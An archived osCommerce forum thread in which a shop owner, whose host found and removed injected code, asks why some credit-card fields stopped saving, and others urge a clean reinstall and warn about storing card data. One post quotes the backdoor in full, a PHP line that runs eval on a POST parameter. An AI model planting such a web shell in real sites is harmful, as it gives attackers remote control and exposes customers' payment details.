Firemann59 Posted August 25, 2015 Share Posted August 25, 2015 I recently found a malicious line of code in cookies_usage.php. This was found by my web host. They took my site down until I had the malicious code removed, then brought my site back up. After it came back up some things are not posting to the database, all during check out. "Credit Card Type", Credit Card Owner", and "Credit Card Expires". Everything else posts to the database just fine. Does anyone have an idea where I can look to solve this problem? I am also still working with the web host to see if it is something on their end. Link to comment Share on other sites More sharing options...
Bob Terveuren Posted August 25, 2015 Share Posted August 25, 2015 Hi have a look at the stuff I added here (not so long ago by coincidence) Sounds you'll maybe need to poke around in your classes/order.php which handles the fields in the database that you are missing - tread carefully and make sure you backup before changing anything in that file - also be aware that the cc_type code lines appear twice in the class file and you should look to the second set for editing. In addition you may also find that the fields are lying empty even after the code edits above - if so then double check the values being POST'ed from checkout_confirmation.php to checkout_process.php - if the names vary from the above link then modify to suit Link to comment Share on other sites More sharing options...
MrPhil Posted August 26, 2015 Share Posted August 26, 2015 Was your site actually doing something improper, or did your host do a routine scan for what they consider "malicious" code, and removed code they felt was bad? I've seen hosts do that, and end up removing perfectly good code, causing applications to crash. What osC version are you running, what add-ons does it have, and what was the code removed? Have you compared it to the original code and confirmed that it was added by a hacker, or are you just taking your host's word for it what happened? Link to comment Share on other sites More sharing options...
Firemann59 Posted August 26, 2015 Author Share Posted August 26, 2015 I am running osC v2.2 rc2. The malicious code was a line in cookies_usage.php that was referenced here: The cookie_usage.php appears to have been compromised with the injection of a malicious section at the top:if (isset($_GET["cookie"])) { echo 'cookie=2'; if (isset($_POST["es4"])) @eval($_POST["es4"]); exit; }This allows the execution of PHP commands, as described here:http://www.oscommerce.com/forums/topic/372970-malware-cookie-usagephp-explained/ This line of code was removed, nothing else was touched. Here is the posting script from includes/classes/orders.php: $this->info = array('order_status' => DEFAULT_ORDERS_STATUS_ID, 'currency' => $currency, 'currency_value' => $currencies->currencies[$currency]['value'], 'payment_method' => $payment, 'cc_type' => (isset($GLOBALS['cc_type']) ? $GLOBALS['cc_type'] : ''), 'cc_owner' => (isset($GLOBALS['cc_owner']) ? $GLOBALS['cc_owner'] : ''), 'cc_number' => (isset($GLOBALS['cc_number']) ? $GLOBALS['cc_number'] : ''), 'cc_expires' => (isset($GLOBALS['cc_expires']) ? $GLOBALS['cc_expires'] : ''), 'cc_cvv2' => (isset($GLOBALS['cc_cvv2']) ? $GLOBALS['cc_cvv2'] : ''), 'shipping_method' => $shipping['title'], 'shipping_cost' => $shipping['cost'], 'subtotal' => 0, 'tax' => 0, 'tax_groups' => array(), 'comments' => (isset($GLOBALS['comments']) ? $GLOBALS['comments'] : '')); And only cc_type, cc_owner, and cc_expires are affected. Link to comment Share on other sites More sharing options...
burt Posted August 27, 2015 Share Posted August 27, 2015 If your site has this hack, it likely has more. Worst Case Scenario: any customer of yours who paid by CC has had their card details harvested. To ensure that your site is not malicious and to protect your future customers; 1. shut down your entire shop today. 2. put up a holding page explaining that you are spring cleaning and updating 3. ensure your database is free of hack activity 4. get the latest version of osCommerce up and running, and link it to your existing database 5. stop using the CC module Link to comment Share on other sites More sharing options...
MrPhil Posted August 27, 2015 Share Posted August 27, 2015 Yes, if you are using the old CC module, and storing credit card and CVV2 numbers for any length of time (or even just handling them), without being formally PCI-DSS compliant, you are almost certainly in violation of your merchant account agreement. You can face stiff penalties and even criminal prosecution, so stop using it immediately. By the way, osC 2.2 RC2 is ancient... you should be switching over to 2.3.4 as quickly as reasonably possible. Link to comment Share on other sites More sharing options...
Firemann59 Posted August 31, 2015 Author Share Posted August 31, 2015 I am not looking for legal advise or criticism I am needing help getting my site back running properly. Link to comment Share on other sites More sharing options...
♥14steve14 Posted August 31, 2015 Share Posted August 31, 2015 If your site has been hacked the easiest way to get your site working again is to remove the whole site from your server and upload a known good copy from your backups. Removing the whole site will remove any back doors the hacker may have also installed. If you dont have backups, start keeping then regularly, just in case, or you could ask your hosts whether they have a good copy of your site. Some hosts offer a daily backup service included, so it may be worth a try. My hosts keep backups for 30 days, so it could be worth a try. Your other option is to check through every file of your stores code checking it against a standard new file, or one that you know was good. It takes time doing it line by line, but it is the only real way to make sure that there is no other code. If you dont have a good known copy of your store, or cannot find any other malicious code, you will probably need help from the very people that you are insulting. They are trying to help you with very limited information from you. What @@burt suggested is the route you should ideally take. The version you are using is very old and considered by some to be vulnerable to hacks. The latest version is much more secure and if you use the BS version you may even get better search engine ranking as it is responsive. Its your store so you have to make the decision what you need to do. Track down any malicious code or bite the bullet and start again. If it was me, I would start again because the chances are it will happen again on your old store. I expect the hacker is having a regular look to make sure you are still having problems. REMEMBER BACKUP, BACKUP AND BACKUP Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.